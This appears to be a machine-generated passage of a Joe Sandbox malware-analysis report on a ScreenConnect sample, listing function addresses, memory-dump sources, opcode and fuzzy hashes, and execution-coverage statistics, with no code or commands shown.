                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fffb515070f6c88039a44ed4bcced7a5abd6093b1a7b85fd2edfc8042b4e0070
                                                                                                                                                                                                                                          • Instruction ID: 2f938faaf98c554d46fa8313b109bd4404beb6d20743a65ff6fe7c577f20288f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fffb515070f6c88039a44ed4bcced7a5abd6093b1a7b85fd2edfc8042b4e0070
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E02632B412055FC3149A2AF8409ABF3AAEBE9764F20483ED50CD7321CE728C03CB80
                                                                                                                                                                                                                                          Function 01F40E30 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9fe4e1bb75ac5602eb7b37ca865b73f417fd2599b9519b032a78a3155ada1e59
                                                                                                                                                                                                                                          • Instruction ID: 6e494a988ad6653f6d7ffab6068a0b6003c3f1e819ee44fc6116264a5b29008e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe4e1bb75ac5602eb7b37ca865b73f417fd2599b9519b032a78a3155ada1e59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E0D8322002015783157769B40449E7BAEFFC5262310857FD20ACB328DF72DC0687D0
                                                                                                                                                                                                                                          Function 01F4F970 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 52b58d7a418a04676a9d7b43abacf4891dd25a5824fcc55324ec239bf1c84911
                                                                                                                                                                                                                                          • Instruction ID: 7d112b11210d13093128b278f26d1c3257f75a2d0daada3a2587b75c049d49bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52b58d7a418a04676a9d7b43abacf4891dd25a5824fcc55324ec239bf1c84911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE026327012051BC304A62AE840957F3AAEBD9664F10483DD50CC7311CD729C028690
                                                                                                                                                                                                                                          Function 044D54B8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5c4486c068cdd8120ddf0e656829c62ac632b9b5da66e4ddafd90ea03525c9b6
                                                                                                                                                                                                                                          • Instruction ID: 0f4dce1032d160c61640102fd8525d9d195dcdd3036c4eec1694c14689769abc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c4486c068cdd8120ddf0e656829c62ac632b9b5da66e4ddafd90ea03525c9b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E092343002008FC3149B1EC544E12BBEAEFC5715B1684A9E5098B3B1CB71FC41CB90
                                                                                                                                                                                                                                          Function 044D56E8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5f8c8f961971c8e4b2565d7cda8c0d7ec99206acbf79c6df55638fde9673e6c3
                                                                                                                                                                                                                                          • Instruction ID: b2498f454ceff25b27e48b5d31b9006da5754b058789f6b770627fff32230fb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8c8f961971c8e4b2565d7cda8c0d7ec99206acbf79c6df55638fde9673e6c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE09AB0951108AFCB41CEA4E8408DD7BBAEB8520971881AAD004D7625EA306E128700
                                                                                                                                                                                                                                          Function 01F43257 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35f6d0007fcb93a9cc3fb93c504fd52287f4f7738b0f032da997f87fc775db0d
                                                                                                                                                                                                                                          • Instruction ID: 3b4f08467bb874fee49546823f5361d3b9e12963479f867b67b10b4b535660a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35f6d0007fcb93a9cc3fb93c504fd52287f4f7738b0f032da997f87fc775db0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03E092322093851FC726DB68F8409CD7FB5EEC2211B0849EED4409B567D6A5EA098391
                                                                                                                                                                                                                                          Function 044D0C70 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e2afa39112b9bc972b5a9c979c0457a92a2b7255058f93626c3267c2e1c39962
                                                                                                                                                                                                                                          • Instruction ID: 5aa3bb9bab3d525b109e3b12f0f262ff187b3255bd725fd25edd18dd9c42ce9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2afa39112b9bc972b5a9c979c0457a92a2b7255058f93626c3267c2e1c39962
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85E0DFB0E46608AFCB40CFA8E9504CCBF78EF8520870106EEC848DB211DB351F169790
                                                                                                                                                                                                                                          Function 06350448 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9e1a9498ae67622e2b9aafda067b93a94e905c82b9dbb902011f1e5cfebbb1af
                                                                                                                                                                                                                                          • Instruction ID: c4f1eb2d172e3f9f3588b8a23c485951a942b48cc556d7088f099a6e2af4ee9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e1a9498ae67622e2b9aafda067b93a94e905c82b9dbb902011f1e5cfebbb1af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1E08672200200639219AA7AB84089F76AEEEC2665344C97FD10A9F215DE73EC0A87D4
                                                                                                                                                                                                                                          Function 01F45950 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 12bc8a4bb8421447b4ad8fa2906470886d777f0feafb3292f69f7bd37eb38afd
                                                                                                                                                                                                                                          • Instruction ID: 092bccf270a2ee6cb557e9283e338f76feb9220b569e1ed80f8c3dc9f4a2ffb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12bc8a4bb8421447b4ad8fa2906470886d777f0feafb3292f69f7bd37eb38afd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E086353001105797447679A86855EBA9ADBD9532320812EE516D3380CE389C0187A0
                                                                                                                                                                                                                                          Function 01F45999 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5f8402ef74b110b4c5074a09988c758cb4b3229b620e428ff9611a6ce1ffd9ff
                                                                                                                                                                                                                                          • Instruction ID: f93049baeb0861b27103f41e91d639cce16baf68039d9dd12b71be90e61c1eca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8402ef74b110b4c5074a09988c758cb4b3229b620e428ff9611a6ce1ffd9ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBE0DFB0D461089FCB44EFA4EA9158CBBB0FF45204B1188EEC009D7122DA319F01CB00
                                                                                                                                                                                                                                          Function 01F4B015 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1085883f8013606afcc1ea630027099fe85ea351251e9641fcbd363edbc8bac7
                                                                                                                                                                                                                                          • Instruction ID: c27f458c0c4ddfa2f8bb332e0ebcb5b929f2a5936dab903329d8d9384e122dcc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1085883f8013606afcc1ea630027099fe85ea351251e9641fcbd363edbc8bac7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E04F7051D3919FC3819F38A9541497FF0AE06604B4648AAD8C9C7252E235AC06C762
                                                                                                                                                                                                                                          Function 044D5760 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                                                                          • Instruction ID: c5b5e4ce50a7f8dc23d30bc6c635d0241b3f2dcdcadea542bb2c317d204b7862
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E0EC75E10219DF8B90EFBDD80559DBBF8FF08650B1040A6D909E7311E3309A108BD1
                                                                                                                                                                                                                                          Function 01F4BCA1 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e8ef14a019890c9d4468371f27b62e2408e514e010054e77eb06125c5f1d17c3
                                                                                                                                                                                                                                          • Instruction ID: 89f4abd1f5babf1d6b8b91a479df2d2f856732b1105de2e41f857c1760c22dd3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8ef14a019890c9d4468371f27b62e2408e514e010054e77eb06125c5f1d17c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E01230819351DFC380EF38E64908AFBE4EF45214F09C8AED8C8C7201E334A846CB52
                                                                                                                                                                                                                                          Function 044D4720 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b90a5939b86efd75c9515bfbd6bf135b97a6d283ffa012a937ab6c5800b7da36
                                                                                                                                                                                                                                          • Instruction ID: e5d8d4285f3a833b232d3ba81c94f853685be11f2cfb7275de4d44a0648e5832
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b90a5939b86efd75c9515bfbd6bf135b97a6d283ffa012a937ab6c5800b7da36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5D05E343502154FC784E738E44486E73DA9F8952435140A4D40DCB320EE60EC0247E1
                                                                                                                                                                                                                                          Function 01F4ED48 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 36b840cc30f19fc6fa341fca51e44ad9e4fdb1809195edabe94b862140ea8ea6
                                                                                                                                                                                                                                          • Instruction ID: 48751b59ef0c4f094f89e690b78e5b729e63c3430e797868aac6921121cd4db1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36b840cc30f19fc6fa341fca51e44ad9e4fdb1809195edabe94b862140ea8ea6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E08631404749CFC701EF64D499465BB74EF95300B06C68AD4895F163FB70D985D751
                                                                                                                                                                                                                                          Function 01F459A8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a407a447132894adcb9d6365e10c94047f17308b41dfebf2d5971541505c755c
                                                                                                                                                                                                                                          • Instruction ID: 5364074c449c55d6ab2dfec7a4b2c19faf68abbf2ea2dab5627569ab259f4e3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a407a447132894adcb9d6365e10c94047f17308b41dfebf2d5971541505c755c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72D05E70A4210DEFDB40FFB8EA4095DF7F9EB49204B5085ADD808E7210EB31AF049B90
                                                                                                                                                                                                                                          Function 044D0C80 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8ede62cf6c1fda6f53b71e9d36a8d418f4f4c9c9687d19df80fdd3a4dbb741f6
                                                                                                                                                                                                                                          • Instruction ID: f8b1226b33961fae0a550ba720014e279fb6773198c5c1c6c4d366999302e6e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ede62cf6c1fda6f53b71e9d36a8d418f4f4c9c9687d19df80fdd3a4dbb741f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD017B0E4110DEFCB44DFA8E94099DBBBDEF48204B5045EED848E7210EB316E009B90
                                                                                                                                                                                                                                          Function 044D56F8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b3080200607168f64027c4b2ce1bf126e42ccbcc785f40464bcdce33ca638fee
                                                                                                                                                                                                                                          • Instruction ID: cf73d9d4dfcfd33c9ab9cbfb093686746dbed6c448118565e06f2f32c6007592
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3080200607168f64027c4b2ce1bf126e42ccbcc785f40464bcdce33ca638fee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D01770A4120CEFCB40DFA9E95095DBBB9EB49604B5045A9D408E7224EA317F009B90
                                                                                                                                                                                                                                          Function 01F4DF28 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0c59c3a51408c854122ed40dfc5a5f7999dfa11816bd66ee0bce072a825eee99
                                                                                                                                                                                                                                          • Instruction ID: 86ed5ec2cd13d7303635bb26eb1e8f912b873661ed1946ef69748ed42d3fd428
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c59c3a51408c854122ed40dfc5a5f7999dfa11816bd66ee0bce072a825eee99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7D05E2800E3C00FDF02DBB070900453FA0EA47212F99D88FC880C2462C3746456CB23
                                                                                                                                                                                                                                          Function 06350490 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 556a1521dbd5a1f97bab8cba5773f9ae8465715e74bbc45e176300ba725a395c
                                                                                                                                                                                                                                          • Instruction ID: a5f6fe80cd6f94e69cd8a10beb47ab66009288d063768e987682fc3514336aed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 556a1521dbd5a1f97bab8cba5773f9ae8465715e74bbc45e176300ba725a395c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CC08C21E0000067FE588A71C5CB7687752F795B09FAAC06CC48BD7244CB15D003C660
                                                                                                                                                                                                                                          Function 01F4ED58 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fc6a17c23167fff2b36b4f2d247f29f499071a18b120314b899a4e9934c6ad25
                                                                                                                                                                                                                                          • Instruction ID: f2181edb5459da78f437a33d9b5b88e3b51e48afcb02829e89243ddaa8eda9c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6a17c23167fff2b36b4f2d247f29f499071a18b120314b899a4e9934c6ad25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCD0C73181470D8AC700BB78D454469F778EFD5300F05C65AE44967121FF70D5D0D681
                                                                                                                                                                                                                                          Function 044D2FD0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4bc1caedcfa702bc43600412840515b300c27ee4706538ebfe6c65ead80d0e12
                                                                                                                                                                                                                                          • Instruction ID: 195a0b285744cb075e71fa9dee30abd40f7976a368194c12ffbce0555c3af433
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc1caedcfa702bc43600412840515b300c27ee4706538ebfe6c65ead80d0e12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC09B5664FBD41FF722055C78E14CD1F14DC8372D38B02D3C4C1555575109654B5151
                                                                                                                                                                                                                                          Function 044D0160 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1963f9cac14acbba2ff183f0c0ff7c08bf0f3cde44bf077e69cdfd66bc946630
                                                                                                                                                                                                                                          • Instruction ID: b35f5709de7c1eaff1ded07bf2ad634fbf60309d1616e46e56763518ceab0552
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1963f9cac14acbba2ff183f0c0ff7c08bf0f3cde44bf077e69cdfd66bc946630
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EC0483AB41429DFCB00DB98F8848DCB370FF8922AB1001A6E619DB231C732A925CB40
                                                                                                                                                                                                                                          Function 01F4E682 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                          • Instruction ID: 8ecd76cd7f1403fdd00de3eec8c4ceab7a6ba169a6f326fa5a18981b47b18b1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1A002752010009BC244DB54C995C15F765EFE5319728C4AEA9198B256CF33ED13DA54

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:12.5%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:5
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
